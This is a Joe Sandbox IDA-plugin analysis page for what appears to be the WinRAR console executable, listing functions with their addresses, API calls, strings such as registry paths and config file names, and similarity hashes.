Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: AddressProc$CallerCurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 1389829785-2207617598
Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction ID: 77d45e6e7cc1e0e8cccb4119a89db302725295952525e97c45a53216c411387b
Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction Fuzzy Hash: 2B413521A08F8695EB45DB32B84057567A1AF49FF4F280131CC6EC77A4DE7DE846A38C

Function 00007FF61861B0FC Relevance: 13.6, APIs: 9, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF61861B110

Part of subcall function 00007FF61861AA8C: __isa_available_init.LIBCMT ref: 00007FF61861AAA9
Part of subcall function 00007FF61861AA8C: __vcrt_initialize.LIBVCRUNTIME ref: 00007FF61861AAAE

__scrt_fastfail.LIBCMT ref: 00007FF61861B11E

Part of subcall function 00007FF61861B52C: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF61861B548
Part of subcall function 00007FF61861B52C: RtlCaptureContext.KERNEL32 ref: 00007FF61861B571
Part of subcall function 00007FF61861B52C: RtlLookupFunctionEntry.KERNEL32 ref: 00007FF61861B58B
Part of subcall function 00007FF61861B52C: RtlVirtualUnwind.KERNEL32 ref: 00007FF61861B5CC
Part of subcall function 00007FF61861B52C: IsDebuggerPresent.KERNEL32 ref: 00007FF61861B620
Part of subcall function 00007FF61861B52C: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF61861B641
Part of subcall function 00007FF61861B52C: UnhandledExceptionFilter.KERNEL32 ref: 00007FF61861B64C

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF61861B12C
__scrt_fastfail.LIBCMT ref: 00007FF61861B143
__scrt_release_startup_lock.LIBCMT ref: 00007FF61861B1A0
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF61861B1B6
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF61861B1E6
__scrt_is_managed_app.LIBCMT ref: 00007FF61861B21B
__scrt_uninitialize_crt.LIBCMT ref: 00007FF61861B239

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
String ID:
API String ID: 552178382-0
Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction ID: a15830e80ba0e7eb3937bf6d6eaa7ad4a76f26a9ce9ccc0254610109b699b503
Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction Fuzzy Hash: 40314111E0C98342FB55AB34A5523B963A2AF85FA4F444034DA0DC72D7DE2CE804A3D9

Function 00007FF6185F4398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185F43D1
RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185F4402
RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185F440D
GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185F443E

Strings

Software\WinRAR\Paths, xrefs: 00007FF6185F43BC
AppData, xrefs: 00007FF6185F43F7

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: CloseFileModuleNameOpenQueryValue
String ID: AppData$Software\WinRAR\Paths
API String ID: 3617018055-3415417297
Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction ID: c2f808f1ec97448309d1c0c8b6d2cc0b00908c84d1b42f285d32eb5887279a69
Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction Fuzzy Hash: 5D119D26A18B4282EB619F32E8445A9B760FF88FE4F441131EE4E87A56DF3CD444DB49

Function 00007FF6185C7A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H9, xrefs: 00007FF6185C7BF3

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID:
String ID: H9
API String ID: 0-2207570329
Opcode ID: 479a09c780d4be94e5648284cf9069ca7028a91d6761c81901c4d854d78fe811
Instruction ID: d72bceea7558b1c83c21b1dafb9de42aa7f5de871d82ce89857f2d9d9ae2be62
Opcode Fuzzy Hash: 479a09c780d4be94e5648284cf9069ca7028a91d6761c81901c4d854d78fe811
Instruction Fuzzy Hash: 90E1B062A08E9285EB50DB39E448BFD27E9EB45B6CF454435CE4D83B86DF38E544CB08

Function 00007FF6185E2574 Relevance: 7.6, APIs: 5, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00007FF6185E25B0
WriteFile.KERNEL32 ref: 00007FF6185E25F9
WriteFile.KERNELBASE ref: 00007FF6185E262E
GetLastError.KERNEL32 ref: 00007FF6185E2658
SetLastError.KERNEL32 ref: 00007FF6185E2689

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: ErrorFileLastWrite$Handle
String ID:
API String ID: 3350704910-0
Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction ID: 5a0f28e394872fe5a03b25815667116ff4e884ac9363935287afd07f533bd0fd
Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction Fuzzy Hash: E851A322A08A4287EB64DF36E91437AB3A1FB45FA1F440135EE4E87A94CF3CE445C748

Function 00007FF6185E1E80 Relevance: 7.6, APIs: 5, Instructions: 127
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF6185E1F4A
GetLastError.KERNEL32 ref: 00007FF6185E1F59
CreateFileW.KERNELBASE ref: 00007FF6185E1F99
GetLastError.KERNEL32 ref: 00007FF6185E1FA2
SetFileTime.KERNEL32 ref: 00007FF6185E1FF1

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction ID: a28d431b09aa23f6b1b61d21b0f90c2439d9b4082c8273102eddff570a60db23
Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction Fuzzy Hash: FF413772A18A8146FBA48B35E9047A9BAA0E745FB9F000334EE7D876C4DF7CC4458B84

Function 00007FF6185D6AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6185D6C13

Strings

switches_%ls=, xrefs: 00007FF6185D6C03
switches=, xrefs: 00007FF6185D6B80
rar.ini, xrefs: 00007FF6185D6B37

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: swprintf
String ID: rar.ini$switches=$switches_%ls=
API String ID: 233258989-2235180025
Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction ID: c7befb200c21376ca6e40a1e1cd0e389a1bc382d5761eafd3a7fba6580115eac
Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction Fuzzy Hash: E3419C22A18E8281EB50DB31D8501B927E0FB54BB4F400235EE9D87AD6EF3CE546C398

Function 00007FF6185F7E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF61860B470: GetModuleHandleW.KERNEL32 ref: 00007FF61860B488
Part of subcall function 00007FF61860B470: GetProcAddress.KERNEL32 ref: 00007FF61860B4A0
Part of subcall function 00007FF61860B470: GetProcAddress.KERNEL32 ref: 00007FF61860B4D5

Part of subcall function 00007FF6185D7A68: setbuf.LIBCMT ref: 00007FF6185D7A7B
Part of subcall function 00007FF6185D7A68: setbuf.LIBCMT ref: 00007FF6185D7A8F

SetErrorMode.KERNELBASE ref: 00007FF6185F7E5D
GetModuleHandleW.KERNEL32 ref: 00007FF6185F7E65

Part of subcall function 00007FF6186048CC: GetVersionExW.KERNEL32(?,?,?,00007FF6185F7E7D), ref: 00007FF61860496A
Part of subcall function 00007FF6186048CC: LoadLibraryExW.KERNELBASE(?,?,?,00007FF6185F7E7D), ref: 00007FF618604993

new.LIBCMT ref: 00007FF6185F7EA8

Strings

rar.lng, xrefs: 00007FF6185F7E7D

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
String ID: rar.lng
API String ID: 553376247-2410228151
Opcode ID: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
Instruction ID: 8652f893ac4d244db4085d7bc59611af2c07276e55370e829c714d3c288a1b39
Opcode Fuzzy Hash: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
Instruction Fuzzy Hash: DB419D21E08E8746FB90AB30A8511B927A1DF91FB4F480235E90ECB2D7DE2DE4059798

Function 00007FF6185F40A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetMalloc.SHELL32(?,00000800,?,00007FF6185F4432,?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185F40C4
SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185F40DF
SHGetPathFromIDListW.SHELL32 ref: 00007FF6185F40F1

Part of subcall function 00007FF6185E3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6185F413F,?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185E34A0
Part of subcall function 00007FF6185E3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6185F413F,?,?,?,?,00000800,00000000,00000000,00007FF6185F38CB,?,?,?,00007FF6185F41EC), ref: 00007FF6185E34D5

Strings

WinRAR, xrefs: 00007FF6185F410F

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
String ID: WinRAR
API String ID: 977838571-3970807970
Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction ID: 78fbd92800949100078a51e405b4e797472ec9c07c662afae368635002318818
Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction Fuzzy Hash: E8214F16A08E4291EB509F32F9545BA6760FF99FF0B485031EF4E87766DE3CD4448744

Function 00007FF6185E1C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,?,00007FF6185E21A7,00000000,00000028,?,00007FF6185D7792), ref: 00007FF6185E1C97
ReadFile.KERNELBASE ref: 00007FF6185E1CB6
GetLastError.KERNEL32 ref: 00007FF6185E1CEA
GetLastError.KERNEL32 ref: 00007FF6185E1D08

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
Instruction ID: 5c66485f1d1212e547ae8428d89ea9f0849e6b7069a4689c1ebb1943ab5676a5
Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
Instruction Fuzzy Hash: 71215E21E48E4681EBA08A32E9003B9B6A4FB45FB6F104531E95DCB6C4CE2DD8448749

Function 00007FF6185D49F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

Strings

AFUM, xrefs: 00007FF6185D4B8C
default.sfx, xrefs: 00007FF6185D4AB0

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID:
String ID: AFUM$default.sfx
API String ID: 0-2491287583
Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction ID: 1d195576baf5742005ce613673bee18c833fccb1b692ea4e8bc557cc0c8d42fd
Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction Fuzzy Hash: AC81B621A0CE8240FFB09B3195802FD2AA1EF51FA5F448231DE8D876D6DF6DA486C75C

Function 00007FF61860B9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF61860B9F8
SetThreadPriority.KERNEL32 ref: 00007FF61860BA4E

Part of subcall function 00007FF6185DCDA4: wcschr.LIBVCRUNTIME ref: 00007FF6185DCE0F
Part of subcall function 00007FF6185DCDA4: wcschr.LIBVCRUNTIME ref: 00007FF6185DCE22

Part of subcall function 00007FF6185DCA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF6185DCEDE

Strings

CreateThread failed, xrefs: 00007FF61860BA06

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: Threadwcschr$CreateExceptionPriorityThrow
String ID: CreateThread failed
API String ID: 1217111108-3849766595
Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction ID: e8ceab1d728775bbb51760c3d0eec3aa0f7148241139ff66f894b222981a9357
Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction Fuzzy Hash: 42113D31A08F4282EB15EF30F8411A97360FB84FA4F548131EA9D86769DF3CE946D788

Function 00007FF61860BB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

